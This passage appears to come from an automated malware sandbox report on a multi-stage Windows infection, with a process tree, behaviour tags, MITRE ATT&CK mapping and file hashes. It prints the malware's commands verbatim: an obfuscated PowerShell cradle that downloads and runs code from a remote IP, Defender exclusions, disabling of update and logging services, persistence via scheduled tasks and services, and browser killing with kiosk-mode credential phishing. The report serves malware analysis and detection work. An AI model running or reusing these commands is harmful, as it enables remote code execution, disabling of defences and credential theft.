-
-
-
C:\Users\Admin\AppData\Local\Temp\1015233001\a6938fd3d4.exe"C:\Users\Admin\AppData\Local\Temp\1015233001\a6938fd3d4.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\1015234001\9b9b5d2450.exe"C:\Users\Admin\AppData\Local\Temp\1015234001\9b9b5d2450.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\1015235001\e08cedcd1e.exe"C:\Users\Admin\AppData\Local\Temp\1015235001\e08cedcd1e.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3652 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:3780
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2876 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bcb0f5-2e7a-4880-86e0-396ea6209531} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" gpu10⤵PID:3940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2452 -prefMapHandle 2448 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb6dc5e8-0feb-451e-9ef0-ff4e7c2274e5} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" socket10⤵PID:4936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3124 -childID 1 -isForBrowser -prefsHandle 3060 -prefMapHandle 3056 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8370fea0-f7b4-4a6a-a7b3-55098b8b90df} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" tab10⤵PID:5124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4208 -prefMapHandle 4204 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b100c0f4-0346-4ba7-8468-74a880df32ca} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" tab10⤵PID:2900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4684 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4828 -prefMapHandle 4812 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13989c34-0b22-4805-989f-a8647b64080f} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" utility10⤵
- Checks processor information in registry
PID:5588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5128 -childID 3 -isForBrowser -prefsHandle 5028 -prefMapHandle 5016 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52df7667-01e0-4239-a46a-6516be2e5c32} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" tab10⤵PID:6740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4964 -childID 4 -isForBrowser -prefsHandle 5256 -prefMapHandle 5152 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90aa39d3-268e-4b5d-a393-b72be4e99cd1} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" tab10⤵PID:6776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5140 -childID 5 -isForBrowser -prefsHandle 5452 -prefMapHandle 5460 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0147cc12-0e9e-410d-8487-c967948ff5a6} 2876 "\\.\pipe\gecko-crash-server-pipe.2876" tab10⤵PID:6984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1015236001\1081e922e8.exe"C:\Users\Admin\AppData\Local\Temp\1015236001\1081e922e8.exe"7⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\1015237001\17f49b7a2a.exe"C:\Users\Admin\AppData\Local\Temp\1015237001\17f49b7a2a.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\1015238001\b3bb9917a2.exe"C:\Users\Admin\AppData\Local\Temp\1015238001\b3bb9917a2.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"8⤵PID:6140
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SetWindowsHookEx
PID:2068
-
-
C:\Windows\system32\mode.commode 65,109⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted9⤵PID:3164
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted9⤵PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted9⤵PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted9⤵PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted9⤵PID:6632
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted9⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted9⤵PID:3012
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"9⤵
- Views/modifies file attributes
PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"9⤵PID:6828
-
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe10⤵
- Views/modifies file attributes
PID:1172
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe10⤵
- Views/modifies file attributes
PID:1996
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE10⤵
- Scheduled Task/Job: Scheduled Task
PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe10⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5244 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.111⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6116
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1015239001\86ec224ca6.exe"C:\Users\Admin\AppData\Local\Temp\1015239001\86ec224ca6.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6332 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\1015239001\86ec224ca6.exe"C:\Users\Admin\AppData\Local\Temp\1015239001\86ec224ca6.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\1015240001\e713b60588.exe"C:\Users\Admin\AppData\Local\Temp\1015240001\e713b60588.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1015240001\e713b60588.exe" & rd /s /q "C:\ProgramData\X4OH4OHLXBIM" & exit8⤵PID:3148
-
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- Delays execution with timeout.exe
PID:3928
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 19248⤵
- Program crash
PID:5964
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Z2786.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Z2786.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P57p.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P57p.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3128
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4r428k.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4r428k.exe3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3612
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3784
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4328
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4524
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1952
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4244
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3540
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4128
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
PID:3848
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2344
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4724
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
PID:740 -
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\smm15sej.js2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1996 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\temp\smm15sej.js"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='##(N##ew-O###bje###ct N###et.W###e'; $c4='b##Cl####ie##nt##).###D###ow#nl##o##'; $c3='a##dSt####ri#####n###g(''http://176.113.115.178/GO.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('#','');I`E`X $TC|I`E`X4⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Roaming\LB311.exe"C:\Users\Admin\AppData\Roaming\LB311.exe"5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5752 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:6028
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:908
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:5644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:5820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:2044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:4380
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"6⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"6⤵
- Launches sc.exe
PID:5468
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:5164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"6⤵
- Launches sc.exe
PID:2792
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:464 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2280
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3464
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1876
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1948 -ip 19481⤵PID:6684
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
4Disable or Modify Tools
3Modify Registry
4Virtualization/Sandbox Evasion
2Discovery
Browser Information Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5df27a876383bd81dfbcb457a9fa9f09d
SHA11bbc4ab95c89d02ec1d217f0255205787999164e
SHA2568940500d6f057583903fde1af0287e27197410415639fc69beb39475fa5240dc
SHA512fe68271375002cfcf8585c92b948ae47cd1632919c43db4bc738e2bc85ceea6dd30880dba27df9c3317531f1017624d4bd8979e6c5fad58112c7aa1189f0b844
-
Filesize
2KB
MD5406476e1cb09606693e11405f1832ad5
SHA1c89a1f7c64f5195f67a10cc326f268bd90fda256
SHA2568e66fe3e77ad60c4620029499788e9cc4e2b14fc1c88156fea5100a136162feb
SHA51284a85bc1565c1c8cc18b990a8dbe1793aabb1a600eb328c9a933396706c22b1fedb126b2f1354e3cde0ce8c2d44f85e2beb203a843fbc5cbd74421b11cbb8a32
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
18KB
MD5f33795aae99d92cc9a08986e3cb0a204
SHA1a3a51919680a59badc42da41bc4847eac9bf2a06
SHA256fa7278a749d020259846c753926b36360e08276ad0bb0b393e36b1094a13dc79
SHA512f500f11b5830f8cbde1f0f258495be17ae38e7e1bde21c3339e9f646c21a4107005c7e17234abe1532598706baeaf41813b0bbb76a28aee7c5805b485ea9c9bd
-
Filesize
17KB
MD57a7eca429dd970ffbb7c7d81ceec7752
SHA14d44e8dab2e43f90056abba5f917ff13c329e89c
SHA2569b1d4e709a255ac286d418871b43e6b2d7db7719ab2ecbfa9327ec2ebb8a5ea4
SHA512f07848a802e50be392fc1151d10bcf7c026b5ce520176758f64755479b5af0f2b2622a829d36c658cb5daac92a25d44d667e74e55e1dae40aacaa96c634cb077
-
Filesize
17KB
MD5976e4b34dd4e6df47be1b607fa811593
SHA1790cd4afada1e72a3110087f2699c33e06a95a2e
SHA25680336606a50b2409b76d68de0c3f4cd1809a728a64f42ef42f932ad447b18e52
SHA512d42cdcd36fa640b523e648f5be9bbf85ce85d6ad053e67befd10dc73e89e64ea512a370438acb34c71905e572015ce0f59820e9d88a438abc6ef5b5ba613857e
-
Filesize
17KB
MD53d1b5ae845f9ddf8214ebdce0167bb77
SHA1dcaa3ff28d4a8c31f27db7e512ce6aab5f6231ff
SHA25617c6ff34d48994675f259b697100b311ecd4a77cd0c40696d6f226a9662e8b00
SHA512bc349d9d2c5d6040e2cfe81d032bbadeb635b91ddf61393749c6341c8a1525032c2389d62c39f44e8e591c08e1a18c29c7928895499200cacab72c7860806d67
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\activity-stream.discovery_stream.json
Filesize20KB
MD5441222c87fc224ddc5d3c9de2dd6c953
SHA12f452c3b7f7cdddd7bc46e8d3fec8c101c5fab2e
SHA256ccf98095038ad8269d4feb0818d9e1ad4a3071587cd8a24c58f495ac025b9baa
SHA5124a807c0ddac40b1f63c7897537e379ebb13d80762fce89af62f3494c024a63af86baa17f1f0365755c6a8aafdff38bf041c27eb2d3d70aacc35a83409bfcc812
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
Filesize13KB
MD57b106e457e6857fb914f9c81b63ce4f7
SHA10caaba66354b157eb68925f6f022d4bba769f166
SHA2569ae3e9f46ed16f504ec992e8b467a4c863f62e4c20b61c7616d3f871b001b70e
SHA512b2700d549259686c497903ee338699ab47f2f3c91176ac974e76ceb876d7be8914c96752d23179158b55ea64276c49159f3c451e81c47d7a26cdb5ebf712d524
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
256B
MD540cf07bf447fde05c5e639e03ee6e3cf
SHA1c0da6c142eda81c9ee4ce68bd72577eb51902f49
SHA2568a4d3365c02d1b7b4cd5951dd38c35265d13a2925d933042229cd0215e669079
SHA51230d4753d2fe3ef7bb5310048fc7373e2ee749f8c230180fb9517a7d93297f03d1ce4f940f2bdd104976bf59f906ed0f8f9627533e77791d51c62e53d50ee9a88
-
Filesize
944KB
MD5a43d4cd82228531e8b0b1c7f4f9b7777
SHA1d49f07c7c42e5af78f4621c4958476c185039c5c
SHA2569c2118ab1bc53de68cf0c814aa895cd4ebd29dda8a843c8d1ed7ce0b9b8bd1f9
SHA5122c2861741d87b6d2711fe30c37aadb0f58a6f1900630f7ebbe653101f6864fd8f5061c7d94099c7887b6fad569e068589f1ecb215b3636e40cebe0ac41097ec6
-
Filesize
2.5MB
MD52a78ce9f3872f5e591d643459cabe476
SHA19ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA25621a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA51203e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9
-
Filesize
4.2MB
